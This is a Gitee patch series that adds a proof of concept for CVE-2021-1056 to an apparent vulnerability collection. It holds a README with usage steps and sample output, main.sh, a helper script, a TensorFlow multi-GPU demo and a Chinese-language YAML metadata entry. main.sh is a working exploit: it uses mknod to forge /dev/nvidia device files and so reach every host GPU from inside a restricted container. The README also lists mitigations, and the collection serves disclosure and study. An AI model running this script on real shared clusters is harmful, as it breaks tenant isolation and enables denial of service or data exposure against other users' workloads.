From 42b611fcfc7fe2157cd907bdc92b3ae702903935 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:27:22 +0000 Subject: [PATCH 01/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20nvidia?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/nvidia/.keep diff --git a/cve/nvidia/.keep b/cve/nvidia/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3b4d94d28e0b3cd667f405b59582b15e8cbec7b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:27:33 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/nvidia/2021/.keep diff --git a/cve/nvidia/2021/.keep b/cve/nvidia/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ceec4d9064ae6035fea89ab77cc7185bdb23fc2f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:27:59 +0000 Subject: [PATCH 03/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-1056?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/CVE-2021-1056/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/nvidia/2021/CVE-2021-1056/.keep diff --git a/cve/nvidia/2021/CVE-2021-1056/.keep b/cve/nvidia/2021/CVE-2021-1056/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From feaac7c073cea3cb2abe5ea13feb2fdff9c966b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:28:07 +0000 Subject: [PATCH 04/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/nvidia/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/nvidia/2021/.keep diff --git a/cve/nvidia/2021/.keep b/cve/nvidia/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d740fbb1e3dd1b93c8019ffe5d03b042f234734d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:28:23 +0000 Subject: [PATCH 05/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/nvidia/2021/CVE-2021-1056/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/CVE-2021-1056/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/nvidia/2021/CVE-2021-1056/.keep diff --git a/cve/nvidia/2021/CVE-2021-1056/.keep b/cve/nvidia/2021/CVE-2021-1056/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 535482b357e43e66359afbbd55a8195e4dc15a3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:29:06 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/nvidia/2021/.keep diff --git a/cve/nvidia/2021/.keep b/cve/nvidia/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9abfa8f1cf54bac09e27df09e2cb660e475e718a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 07:29:16 +0000 Subject: [PATCH 07/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-1056?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/CVE-2021-1056/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/nvidia/2021/CVE-2021-1056/.keep diff --git a/cve/nvidia/2021/CVE-2021-1056/.keep b/cve/nvidia/2021/CVE-2021-1056/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 045658ac99d3bff86fd5983c96d155aa879902f2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:19:49 +0000 Subject: [PATCH 08/19] add cve/nvidia/2021/CVE-2021-1056/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- cve/nvidia/2021/CVE-2021-1056/README.md | 163 ++++++++++++++++++++++++ 1 file changed, 163 insertions(+) create mode 100644 cve/nvidia/2021/CVE-2021-1056/README.md diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md new file mode 100644 index 00000000..ca9ccc4a --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/README.md @@ -0,0 +1,163 @@ +# CVE-2021-1056 + +NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. + +Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details. + +## How it works + +By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. + +It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster. + + + +## Prerequisite + +* Docker 19.03 +* `nvidia-container-toolkit` + +* NVIDIA Driver 418.87.01 / 450.51.05 +* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80 + +NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers. + + + +## Usage + +* start a container with only 1 GPU card and mount + +```bash +$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash +``` + + + +* check gpu status **in container** + +```bash +# nvidia-smi +Sat Jan 9 07:21:03 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* execute script **in container** + +```bash +# bash /CVE-2021-1056/main.sh +[INFO] init GPU num: 1 +[DEBUG] /dev/nvidia0 exists, skip +[DEBUG] successfully get /dev/nvidia1 +[DEBUG] successfully get /dev/nvidia2 +[DEBUG] successfully get /dev/nvidia3 +[DEBUG] delete redundant /dev/nvidia4 +[INFO] get extra 3 GPU devices from host +[INFO] current GPU num: 4 +[INFO] exec nvidia-smi: +Sat Jan 9 07:22:43 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | +| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed + +```bash +# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 & +# nvidia-smi +Sat Jan 9 18:58:23 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | +| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| ++-----------------------------------------------------------------------------+ +``` + + + +## How to prevent + +Recommended + +* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver + +Or + +* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers +* Enable `security context` in kubernetes clusters when creating a pod \ No newline at end of file -- Gitee From 76751ceb0291e8531a12dd9b61f5a772b597d20a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:20:34 +0000 Subject: [PATCH 09/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/nvidia/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/nvidia/.keep diff --git a/cve/nvidia/.keep b/cve/nvidia/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From ddf961633e7ae82ae9c9f0e052acccd04d724be3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:20:43 +0000 Subject: [PATCH 10/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/nvidia/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/nvidia/2021/.keep diff --git a/cve/nvidia/2021/.keep b/cve/nvidia/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From b55fe8abf274dede310bf7ee6383b60595a37f4b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:20:50 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/nvidia/2021/CVE-2021-1056/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/CVE-2021-1056/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/nvidia/2021/CVE-2021-1056/.keep diff --git a/cve/nvidia/2021/CVE-2021-1056/.keep b/cve/nvidia/2021/CVE-2021-1056/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f94d79b6d5f55f8af2e7474b35f44ac97ad083c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:21:38 +0000 Subject: [PATCH 12/19] add cve/nvidia/2021/CVE-2021-1056/main.sh. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- cve/nvidia/2021/CVE-2021-1056/main.sh | 42 +++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cve/nvidia/2021/CVE-2021-1056/main.sh diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh new file mode 100644 index 00000000..504871b7 --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/main.sh @@ -0,0 +1,42 @@ +#!/usr/bin/env bash + +ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P) +source "${ROOT}/util.sh" + +INIT_GPU_NUM=$(util::get_gpu_num) +util::log_info "init GPU num: $INIT_GPU_NUM" + +# get major number and minor number from a legal GPU +DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1) +DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV)) + +GPU_NO=0 +while : +do + # skip this no if device file already exists + if [ -c "/dev/nvidia$GPU_NO" ]; then + util::log_debug "/dev/nvidia$GPU_NO exists, skip" + GPU_NO=`expr $GPU_NO + 1` + continue + fi + + CURRENT_GPU_NUM=$(util::get_gpu_num) + + # create specify device file to trick cgroup + mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER + + # break if have got all GPUs on the host + if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then + util::log_debug "delete redundant /dev/nvidia$GPU_NO" + rm /dev/nvidia$GPU_NO + break + fi + + util::log_debug "successfully get /dev/nvidia$GPU_NO" + GPU_NO=`expr $GPU_NO + 1` +done + +util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host" +util::log_info "current GPU num: $CURRENT_GPU_NUM" +util::log_info "exec nvidia-smi:" +nvidia-smi \ No newline at end of file -- Gitee From 947ead4a4635b6caf68eaf512b6643ba88339f07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:22:08 +0000 Subject: [PATCH 13/19] add cve/nvidia/2021/CVE-2021-1056/util.sh. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- cve/nvidia/2021/CVE-2021-1056/util.sh | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 cve/nvidia/2021/CVE-2021-1056/util.sh diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh new file mode 100644 index 00000000..edadd3aa --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/util.sh @@ -0,0 +1,13 @@ +#!/usr/bin/env bash + +function util::get_gpu_num() { + echo "$(nvidia-smi -L | wc -l)" +} + +function util::log_info() { + echo "[INFO] $1" +} + +function util::log_debug() { + echo "[DEBUG] $1" +} \ No newline at end of file -- Gitee From bdaf48ac07d6223a007ab19a163aa2b5fa93b108 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Tue, 14 Mar 2023 10:22:54 +0000 Subject: [PATCH 14/19] add cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- .../2021/CVE-2021-1056/tf_distr_demo.py | 106 ++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py new file mode 100644 index 00000000..e662da34 --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py @@ -0,0 +1,106 @@ +# coding=utf-8 +from tensorflow.examples.tutorials.mnist import input_data +from tensorflow.python.client import device_lib + +mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) + +import tensorflow as tf + +learning_rate = 0.001 +training_steps = 8250 +batch_size = 100 +display_step = 100 + +n_hidden_1 = 256 +n_hidden_2 = 256 +n_input = 784 +n_classes = 10 + +def _variable_on_cpu(name, shape, initializer): + with tf.device('/cpu:0'): + dtype = tf.float32 + var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype) + return var + +def build_model(): + + def multilayer_perceptron(x, weights, biases): + layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1']) + layer_1 = tf.nn.relu(layer_1) + + layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2']) + layer_2 = tf.nn.relu(layer_2) + + out_layer = tf.matmul(layer_2, weights['out']) + biases['out'] + return out_layer + + with tf.variable_scope('aaa'): + weights = { + 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()), + 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer()) + } + biases = { + 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()), + 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer()) + } + + pred = multilayer_perceptron(x, weights, biases) + + cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y)) + return cost,pred + + +def average_gradients(tower_grads): + average_grads = [] + for grad_and_vars in zip(*tower_grads): + grads = [] + for g,_ in grad_and_vars: + expanded_g = tf.expand_dims(g, 0) + grads.append(expanded_g) + grad = tf.concat(axis=0, values=grads) + grad = tf.reduce_mean(grad, 0) + v = grad_and_vars[0][1] + grad_and_var = (grad, v) + average_grads.append(grad_and_var) + return average_grads + + +with tf.Graph().as_default(), tf.device('/cpu:0'): + x = tf.placeholder("float", [None, n_input]) + y = tf.placeholder("float", [None, n_classes]) + tower_grads = [] + optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) + local_device_protos = device_lib.list_local_devices() + num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU']) + with tf.variable_scope(tf.get_variable_scope()): + for i in xrange(num_gpus): + with tf.device('/gpu:%d' % i): + cost,pred = build_model() + tf.get_variable_scope().reuse_variables() + grads = optimizer.compute_gradients(cost) + tower_grads.append(grads) + + grads = average_gradients(tower_grads) + apply_gradient_op = optimizer.apply_gradients(grads) + train_op = apply_gradient_op + + init = tf.global_variables_initializer() + sess = tf.Session() + sess.run(init) + + for step in range(training_steps): + image_batch, label_batch = mnist.train.next_batch(batch_size) + _, cost_print = sess.run([train_op, cost], + {x:image_batch, + y:label_batch}) + + if step % display_step == 0: + print("step=%04d" % (step+1)+ " cost=" + str(cost_print)) + print("Optimization Finished!") + correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) + accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) + with sess.as_default(): + print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})) + sess.close() \ No newline at end of file -- Gitee From 5928ad1ae22a4ec08b2a6722318aff2a94467ca2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Wed, 15 Mar 2023 05:02:14 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/nvidia/2021/yaml/.keep diff --git a/cve/nvidia/2021/yaml/.keep b/cve/nvidia/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3112200789887e7e46f8112549eff59b2eb93aff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Wed, 15 Mar 2023 06:54:49 +0000 Subject: [PATCH 16/19] add cve/nvidia/2021/yaml/CVE-2021-1056.yaml. add cve/nvidia/2021/yaml/CVE-2021-1056.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- cve/nvidia/2021/yaml/CVE-2021-1056.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cve/nvidia/2021/yaml/CVE-2021-1056.yaml diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml new file mode 100644 index 00000000..a60f01f1 --- /dev/null +++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-1056 +source: https://github.com/pokerfaceSad/CVE-2021-1056 +info: + name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。 + severity: 中危 + description: | + 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。 + 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。 + scope-of-influence: + 450, 455, 418-server, 440-server, 450-server, etc. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056 + - https://nvidia.custhelp.com/app/answers/detail/a_id/5142 + - https://ubuntu.com/security/notices/USN-4689-1 + - https://ubuntu.com/security/notices/USN-4689-2 + - https://ubuntu.com/security/CVE-2021-1056 + - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-score: 7.1 + cve-id: CVE-2021-1056 + cwe-id: CWE-276 + tags: 权限提升, 拒绝服务, 信息泄漏, cve2021 \ No newline at end of file -- Gitee From 2b8624370f999e0a2fee636d4afcfcd0bf860ae7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Wed, 15 Mar 2023 06:55:07 +0000 Subject: [PATCH 17/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/nvidia/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/nvidia/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/nvidia/2021/yaml/.keep diff --git a/cve/nvidia/2021/yaml/.keep b/cve/nvidia/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6dc4b71f071d59875b6a856480754f5730772c04 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Wed, 15 Mar 2023 06:58:35 +0000 Subject: [PATCH 18/19] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 390c34e0..dc15528a 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -16,4 +16,6 @@ cve: - CVE-2023-37708 samba: - CVE-2021-44142 + nvidia: + - CVE-2021-1056 cnvd: \ No newline at end of file -- Gitee From 45a5457ce9256c0c14766764f19c99bd988463a9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=BA=BB=E5=BC=80=E6=9C=97?= Date: Wed, 15 Mar 2023 09:31:06 +0000 Subject: [PATCH 19/19] update cve/nvidia/2021/yaml/CVE-2021-1056.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 麻开朗 --- cve/nvidia/2021/yaml/CVE-2021-1056.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml index a60f01f1..40d10b98 100644 --- a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml +++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml @@ -2,12 +2,12 @@ id: CVE-2021-1056 source: https://github.com/pokerfaceSad/CVE-2021-1056 info: name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。 - severity: 中危 + severity: High description: | 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。 scope-of-influence: - 450, 455, 418-server, 440-server, 450-server, etc. + nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056 - https://nvidia.custhelp.com/app/answers/detail/a_id/5142 -- Gitee